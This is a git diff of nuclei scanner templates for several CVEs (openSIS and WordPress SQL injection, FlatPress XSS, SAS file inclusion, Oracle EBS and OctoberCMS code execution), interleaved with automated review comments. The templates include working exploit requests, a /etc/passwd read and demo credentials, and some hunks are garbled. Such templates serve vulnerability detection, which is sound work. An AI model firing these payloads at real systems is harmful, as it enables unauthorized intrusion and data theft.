@@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bbde7bcb52770ee4d4069ff70f33a1a2ff6a5f0a14f5d3f248cacb564bb163c3022100f2bb138214a73c2225936e8621acff01826d61e8fc4c0f793f687f0e894a417d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202757edffd7b33049b4800f2a103e17130c6a711e551b6c494103f56e468676c2022100f5e21ea7300875d7fc8fddbc5308c309b8637309b4b14ffa1e252ef9e82955e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-40973.yaml b/nuclei-templates/CVE-2021/CVE-2021-40973.yaml index 46197a5d83..2ea1e563ed 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-40973.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-40973.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 1.5.2 reference: - https://github.com/spotweb/spotweb/ @@ -18,7 +20,7 @@ info: cve-id: CVE-2021-40973 cwe-id: CWE-79 epss-score: 0.00152 - epss-percentile: 0.5131 + epss-percentile: 0.51404 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" @@ -26,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: 
@@ -54,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ba60028fe4ebcba0787439edb1336e097727d3e6534af36764071e936b66c28022100a8b0b9260dd953a977d69e99448ec07cdcafd475e39be7d1a68c49f700cef914:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022073aa701bbd4649f3814518c9b0fd5f4dae20221785bc65f0e16eb1352444cd05022066909db2e804aff7795a0f544ba36d182e0a3f49d67735b1434b4a5d05a298e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41192.yaml b/nuclei-templates/CVE-2021/CVE-2021-41192.yaml index c1d124c9c0..6de3ff1b9c 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41192.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41192.yaml 
@@ -4,27 +4,39 @@ info: name: Redash Setup Configuration - Default Secrets Disclosure author: bananabr severity: medium - description: "Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value." + description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value. + impact: | + An attacker can gain unauthorized access to sensitive information and potentially compromise the Redash application. + remediation: | + Remove or update the default secrets in the Redash setup configuration file. 
reference: - https://hackerone.com/reports/1380121 - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv - https://nvd.nist.gov/vuln/detail/CVE-2021-41192 - metadata: - shodan-query: http.favicon.hash:698624197 - tags: cve,cve2021,redash,auth-bypass + - https://github.com/getredash/redash/commit/ce60d20c4e3d1537581f2f70f1308fe77ab6a214 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N - cvss-score: 6.50 + cvss-score: 6.5 cve-id: CVE-2021-41192 cwe-id: CWE-1188 + epss-score: 0.00805 + epss-percentile: 0.79795 + cpe: cpe:2.3:a:redash:redash:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: "redash" + product: "redash" + shodan-query: http.favicon.hash:698624197 + tags: cve2021,cve,hackerone,redash,auth-bypass -requests: +http: - method: GET path: - "{{BaseURL}}/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" - "{{BaseURL}}/redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,5 +49,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 +# digest: 490a0046304402202db04f9b255e97cf754ebc3deb27b4a54b33ce8bb5d8d77934815ccb21db9ca4022044559ab86eded575e036a3ddd5082711b30d9a6c7f8aa89fa03a1dc0ea16e380:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/cve-2021-41349.yaml b/nuclei-templates/CVE-2021/CVE-2021-41349.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41349.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41349.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-41432.yaml b/nuclei-templates/CVE-2021/CVE-2021-41432.yaml index 3c8873a4e6..4f48226efe 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41432.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41432.yaml 
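Review bot: The added `remediation` text tells the operator to change secrets in "the Redash setup configuration file", but the description directly above says the defaults come from the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY` environment variables being left unset, so the advice points at the wrong place; something like `remediation: |` / `Set REDASH_COOKIE_SECRET and REDASH_SECRET_KEY to unique, randomly generated values; if an instance ever ran with the defaults, rotate both and invalidate existing sessions.` would match the finding. The description also loses its surrounding quotes in this hunk; it still parses as a plain scalar because it contains no `: ` sequence, but the `<=10.0` and backticks inside it are a reason to keep it quoted as the old side did. `max-request: 2` agrees with the two `path` entries, and `matchers-condition: and` is now explicit, which is correct for a word-plus-status pair.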
@@ -6,20 +6,33 @@ info: severity: medium description: | FlatPress 1.2.1 contains a stored cross-site scripting vulnerability that allows for arbitrary execution of JavaScript commands through blog content. An attacker can possibly steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. + remediation: | + Upgrade to the latest version of FlatPress (1.2.2) or apply the provided patch to fix the XSS vulnerability. reference: - https://github.com/flatpressblog/flatpress/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2021-41432 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/martinkubecka/CVE-References + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2021-41432 cwe-id: CWE-79 + epss-score: 0.00067 + epss-percentile: 0.27705 + cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: + verified: true + max-request: 4 + vendor: flatpress + product: flatpress shodan-query: http.html:"Flatpress" - verified: "true" - tags: cve,cve2021,flatpress,xss,authenticated,oss + tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive -requests: +http: - raw: - | POST /login.php HTTP/1.1 
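Review bot: The `remediation` added near the top of the hunk names FlatPress 1.2.2 as the fixed version, but nothing in the template or its references establishes that version, and the three references appended below it (`ARPSyndicate/kenzer-templates`, `martinkubecka/CVE-References`, `ARPSyndicate/cvemon`) are aggregator repositories rather than the fix itself. Cite the fixing release or commit reachable from the existing `flatpressblog/flatpress/issues/88` link, or drop the version number and keep the advice to upgrade. Adding `intrusive` to `tags` is right for a template that publishes a blog entry, and `max-request: 4` agrees with the four raw requests; the `raw:` list itself begins at the end of this hunk and continues in the next.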
@@ -39,40 +52,34 @@ requests: Login ------WebKitFormBoundarykGJmx9vKsePrMkVp-- - - | GET /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} - - | POST /admin.php?p=entry&action=write HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{nonce}}&_wp_http_referer=%2Fadmin.php%3Fp%3Dentry%26action%3Dwrite&subject=abcd×tamp=&entry=&attachselect=--&imageselect=--&content=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&save=Publish - - | GET /index.php/2022/10 HTTP/1.1 Host: {{Hostname}} - req-condition: true - cookie-reuse: true matchers: - type: dsl dsl: - - "contains(body_4, '

')" - - "contains(body_4, 'FlatPress')" - - "contains(all_headers_4, 'text/html')" - - "status_code_4 == 200" + - contains(body_4, '

') + - contains(body_4, 'FlatPress') + - contains(header_4, 'text/html') + - status_code_4 == 200 condition: and extractors: - type: regex - internal: true name: nonce - part: body group: 1 regex: - - 'name="_wpnonce" value="([0-9a-z]+)" />' - -# Enhanced by md on 2022/10/17 + - name="_wpnonce" value="([0-9a-z]+)" /> + internal: true + part: body +# digest: 490a00463044022012ed36398f3a3adcb31e49e199e687115b484c759fd6cd62c37427c20c9e9e6402203afca5bfd1f61846e94feb44fc4487b7653f647f3f710f3d444859f1386a7c58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41460.yaml b/nuclei-templates/CVE-2021/CVE-2021-41460.yaml index b787a0c64b..2966c0c9f2 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41460.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41460.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ECShop 4.1.0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Apply the latest patch or upgrade to a newer version of ECShop to mitigate the SQL Injection vulnerability (CVE-2021-41460). reference: @@ -16,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-41460 cwe-id: CWE-89 - epss-score: 0.01115 - epss-percentile: 0.82907 + epss-score: 0.00992 + epss-percentile: 0.83223 cpe: cpe:2.3:a:shopex:ecshop:4.1.0:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: shopex product: ecshop fofa-query: product="ECShop" - tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli + tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" 
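Review bot: The new side deletes `req-condition: true` and `cookie-reuse: true` without a replacement, yet the four-request chain (login at `/login.php`, then `GET` and `POST` to `/admin.php?p=entry&action=write` with the extracted nonce, then `/index.php/2022/10`) depends on the session cookie from the first request carrying over. If this repository targets nuclei v3, where cookie reuse is the default and the key is deprecated in favour of `disable-cookie`, the removal is harmless; on an older engine the later requests run unauthenticated and the `body_4` checks can never match, so the intended engine version should be stated or the keys kept. The `raw:` list this hunk edits begins in the previous hunk, and the `contains(body_4, ...)` DSL strings are shown here with their inner text stripped by the page rendering, so the exact marker being matched cannot be reviewed from this view.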
@@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220453134e8f86fb2e192f009f5df4c96343f3736d10065d138168e3427cbf6581102207674e80da3a4bfc2503fd9ca99097ec66e58ff97ba406b1105374f8d83557e74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f97a087872b4e92f17b44312e692cfe4d0f8ec4a6f55166f35bcefacfcff9350220181d6e11e86c111ea5092c9e06badfb85abca47cb28463a32d64be15bf46c207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml b/nuclei-templates/CVE-2021/CVE-2021-41569.yaml index 8368ef8fa0..a65c219ae1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-41569.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-41569.yaml 
@@ -1,45 +1,28 @@ id: CVE-2021-41569 - info: - name: SAS/Internet 9.4 1520 - Local File Inclusion + name: SAS 9.4 build 1520 - Local File Inclusion author: 0x_Akoko severity: high - description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. - impact: | - Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. - remediation: | - Apply the latest security patches or updates provided by SAS to fix the LFI vulnerability in the SAS/Internet 9.4 1520 application. + description: SAS/Intrnet 9.4 build 1520 and earlier allows Local File Inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro. 
reference: - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas - - https://support.sas.com/kb/68/641.html - https://nvd.nist.gov/vuln/detail/CVE-2021-41569 - - https://github.com/ARPSyndicate/kenzer-templates + - https://support.sas.com/kb/68/641.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41569 cwe-id: CWE-829 - epss-score: 0.0083 - epss-percentile: 0.81604 - cpe: cpe:2.3:a:sas:sas\/intrnet:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sas - product: sas\/intrnet - tags: cve2021,cve,sas,lfi - -http: + tags: cve,cve2021,sas,lfi +requests: - method: GET path: - "{{BaseURL}}/cgi-bin/broker?csftyp=classic,+ssfile1%3d/etc/passwd&_SERVICE=targetservice&_DEBUG=131&_PROGRAM=sample.webcsf1.sas&sysparm=test&_ENTRY=SAMPLIB.WEBSAMP.PRINT_TO_HTML.SOURCE&BG=%23FFFFFF&DATASET=targetdataset&_DEBUG=131&TEMPFILE=Unknown&style=a+tcolor%3dblue&_WEBOUT=test&bgtype=COLOR" - matchers-condition: and matchers: - type: regex regex: - "root:[x*]:0:0" - - type: status status: - 200 -# digest: 490a00463044022066c668e47e843611630d49691212fcf0c77d83d76e23ee3b0951b7ec4c12eb2a022018dd9e916134bc6f5153f80143e684c17ed9de2d33bd2a74ba0140f345a91820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-41691.yaml b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml new file mode 100644 index 0000000000..2157dc2b57 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-41691.yaml 
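Review bot: The new side removes `matchers-condition: and` (the `- matchers-condition: and` line near the bottom) while keeping both the `root:[x*]:0:0` regex matcher and the status matcher; nuclei combines matchers with `or` when the condition is omitted, so any 200 response from `/cgi-bin/broker`, including an error page, would be reported as a file-inclusion hit. Keep `matchers-condition: and` directly above `matchers:`. The hunk also reverts `http:` to `requests:` and drops the `impact`, `remediation`, `epss-*`, `cpe` and `metadata` fields that the other templates in this commit are gaining, which looks like a stale copy being synced over a newer one rather than an intended change; the spelling change to `SAS/Intrnet` in the description is the one edit here that is a correction.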
@@ -0,0 +1,53 @@ +id: CVE-2021-41691 + +info: + name: openSIS Student Information System 8.0 SQL Injection + author: Bartu Utku SARP + severity: high + description: openSIS Student Information System version 8.0 is susceptible to SQL injection via the student_id and TRANSFER[SCHOOL] parameters in POST request sent to /TransferredOutModal.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. + remediation: | + Apply the latest security patch or upgrade to a patched version of openSIS Student Information System to mitigate the SQL Injection vulnerability (CVE-2021-41691). + reference: + - https://securityforeveryone.com/blog/opensis-student-information-system-0-day-vulnerability-cve-2021-41691 + - https://www.exploit-db.com/exploits/50637 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169 + classification: + cve-id: CVE-2021-41691 + metadata: + max-request: 2 + tags: cve,cve2021,sqli,auth,edb,opensis +variables: + num: "999999999" + +http: + - raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&language=en&log= + - | + POST /TransferredOutModal.php?modfunc=detail HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5 + + attack: pitchfork + payloads: + username: + - student + password: + - student@123 + matchers: + - type: dsl + dsl: + - 'contains(body_2, "' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-21587.yaml b/nuclei-templates/CVE-2022/CVE-2022-21587.yaml index 7336e7b0ac..c5277580ff 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-21587.yaml 
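Review bot: The third reference, `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4169`, drops the final digit of the id and points at a different CVE record; it should read `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41691`. The first request authenticates with the `student` / `student@123` payload pair, so the template only fires on installations that still carry that demo account; a comment above `payloads:` such as `# relies on the stock demo login; a clean scan does not mean the injection is absent on sites that removed it` would keep operators from over-reading a negative result. `classification` carries only `cve-id`, whereas the other templates in this commit also record `cvss-metrics`, `cvss-score` and `cwe-id` (CWE-89 applies here). The tail of this hunk is garbled in this rendering — the `contains(body_2, ...)` string and the lines after it carry `-` markers inside a new-file hunk — so the matcher block could not be reviewed.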
+++ b/nuclei-templates/CVE-2022/CVE-2022-21587.yaml 
@@ -1,22 +1,34 @@ id: CVE-2022-21587 info: - name: Oracle EBS Unauthenticated - Remote Code Execution + name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical description: | - Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. + Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + remediation: | + Apply the necessary security patches provided by Oracle to mitigate this vulnerability. 
reference: - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ - https://www.oracle.com/security-alerts/cpuoct2022.html - https://nvd.nist.gov/vuln/detail/CVE-2022-21587 + - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html + - https://github.com/manas3c/CVE-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-21587 - tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth,kev + cwe-id: CWE-306 + epss-score: 0.97315 + epss-percentile: 0.99868 + cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + vendor: oracle + product: e-business_suite + tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm -requests: +http: - raw: - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 @@ -42,11 +54,9 @@ requests: ` end ------WebKitFormBoundaryZsMro0UsAQYLDZGv-- - - | GET /OA_CGI/FNDWRR.exe HTTP/1.1 Host: {{Hostname}} - - | POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 Host: {{Hostname}} @@ -74,3 +84,4 @@ requests: part: body_2 words: - Nuclei-CVE-2022-21587 +# digest: 4b0a00483046022100c45c9f9ebb67164fc04895b7e2d1f11d94d05f52e1d1bc9fcc00b9ca55b61557022100fba0253078fac69a0a71ba3e31f20fef037302f17748f29aa9c24211e8e6aae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-21661.yaml b/nuclei-templates/CVE-2022/CVE-2022-21661.yaml new file mode 100644 index 0000000000..12a501de58 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21661.yaml 
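Review bot: The new `name` line reads `Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution`, with the range separator missing its leading space; `Oracle E-Business Suite 12.2.3 - 12.2.11 - Remote Code Execution` reads correctly and keeps the ` - ` convention the other names in this commit use. The rewritten description says an attacker "can execute malware", which is vaguer than the removed text's statement that the Web Applications Desktop Integrator (Upload component) itself can be taken over; keeping the component-level statement tells a reader what to patch. `max-request: 3` agrees with the three raw requests (the `BneViewerXMLService` upload here, the `FNDWRR.exe` fetch and the second upload in the following hunk), which is the kind of consistency worth checking in a bulk metadata sync.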
@@ -0,0 +1,50 @@ +id: CVE-2022-21661 + +info: + name: WordPress <5.8.3 - SQL Injection + author: Marcio Mendes + severity: high + description: | + WordPress before 5.8.3 is susceptible to SQL injection through multiple plugins or themes due to improper sanitization in WP_Query, An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. + remediation: This has been patched in 5.8.3. Older affected versions are also fixed via security release, that go back till 3.7.37. We strongly recommend that you keep auto-updates enabled. There are no known workarounds for this vulnerability. + reference: + - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317 + - https://www.zerodayinitiative.com/blog/2022/1/18/cve-2021-21661-exposing-database-info-via-wordpress-sql-injection + - http://packetstormsecurity.com/files/165540/WordPress-Core-5.8.2-SQL-Injection.html + - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84 + - https://nvd.nist.gov/vuln/detail/cve-2022-21661 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-21661 + cwe-id: CWE-89 + epss-score: 0.93536 + epss-percentile: 0.99044 + cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: wordpress + product: wordpress + tags: cve2022,cve,wp,sqli,wpquery,wpscan,packetstorm,wordpress + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":[""]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, 
"widget_id":1, "theme_id":1, "max_num_pages":10} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "WordPress database error:")' + - 'contains(body, "error in your SQL syntax")' + condition: and +# digest: 490a004630440220206edf3fca8fce751b9a37bcaf064ab02bbdad20008c646af72985ad45025eea0220501370d4eccd70dec21fa6f52259e317934d99654e5bc503187d2098c479b361:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-21705.yaml b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml new file mode 100644 index 0000000000..d48170c9cf --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-21705.yaml 
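Review bot: The probe depends on a non-core AJAX handler, `action=ecsload` in the POST to `/wp-admin/admin-ajax.php`, while `name` and `description` present this as a WordPress core check (`WordPress <5.8.3 - SQL Injection`); on a core-vulnerable site that does not ship whatever registers that action the request presumably does nothing and the template stays silent, which a reader of the description will not expect. State the dependency, e.g. above the request: `# Reaches WP_Query through a plugin-registered admin-ajax action (ecsload); no match does not imply core is patched.` The description also has a comma splice at `WP_Query, An attacker` — a full stop reads better.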
@@ -0,0 +1,94 @@ +id: CVE-2022-21705 +info: + name: OctoberCMS Authenticated Remote Code Execution + author: iPhantasmic + severity: high + description: | + Octobercms is a self-hosted CMS platform based on the Laravel PHP Framework. In affected versions user input was not properly sanitized before rendering. An authenticated user with the permissions to create, modify and delete website pages can exploit this vulnerability to bypass `cms.safe_mode` / `cms.enableSafeMode` in order to execute arbitrary code. This issue only affects admin panels that rely on safe mode and restricted permissions. To exploit this vulnerability, an attacker must first have access to the backend area. + remediation: | + The issue has been patched in Build 474 (v1.0.474) and v1.1.10. Users unable to upgrade should apply https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe to your installation manually. + reference: + - https://github.com/octobercms/library/commit/c393c5ce9ca2c5acc3ed6c9bb0dab5ffd61965fe + - https://github.com/octobercms/october/security/advisories/GHSA-79jw-2f46-wv22 + - https://cyllective.com/blog/post/octobercms-cve-2022-21705/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-21705 + cwe-id: CWE-74 + tags: cve,cve2022,authenticated,rce,cms,octobercms,injection +requests: + - raw: + - | # to obtain session_key and token + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + - | # to perform authentication and obtain admin cookies + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} + - | # to inject php code in Markup editor and perform exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onSave + 
X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 + - | # to obtain theme + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onCreateTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&type=page + - | # to access the template page for generated exploit + POST /backend/cms HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-OCTOBER-REQUEST-HANDLER: onOpenTemplate + X-OCTOBER-REQUEST-PARTIALS: + X-Requested-With: XMLHttpRequest + + _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm + cookie-reuse: true + extractors: + - type: xpath + name: session_key + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[1]" + internal: true + # Obtain _session_key for current OctoberCMS session + - type: xpath + name: token + attribute: value + xpath: + - "/html/body/div[1]/div/div[2]/div/div/form/input[2]" + internal: true + # Obtain _token for current OctoberCMS session + - type: regex + name: theme + part: body + group: 1 + regex: + - 'alert(document.domain)") && contains(body, "microweber")' - 'contains(content_type, "text/html")' condition: and -# digest: 
4b0a004830460221009047d27c248643fb1045ba67411cf31063fd934d576385418738258e720457c5022100f6ef858c4389bb8a0ce86b918cda35ecd79469caea73990d96b9d0ac76e908ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207b0db83c22e130322437f1502e113df36df14a74f5080f56e6281a41e9c5ea0c0220391b8aae54c023d95b44dc3d6d6e938160b8236a2e5b130fc7a3441f22d711a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2185.yaml b/nuclei-templates/CVE-2022/CVE-2022-2185.yaml index 9b04432fd6..bb52187b77 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2185.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2185.yaml 
@@ -1,24 +1,36 @@ id: CVE-2022-2185 info: - name: GitLab CE/EE - Import RCE + name: GitLab CE/EE - Remote Code Execution author: GitLab Red Team severity: high - description: A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. + description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by GitLab to mitigate this vulnerability. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2185 + - 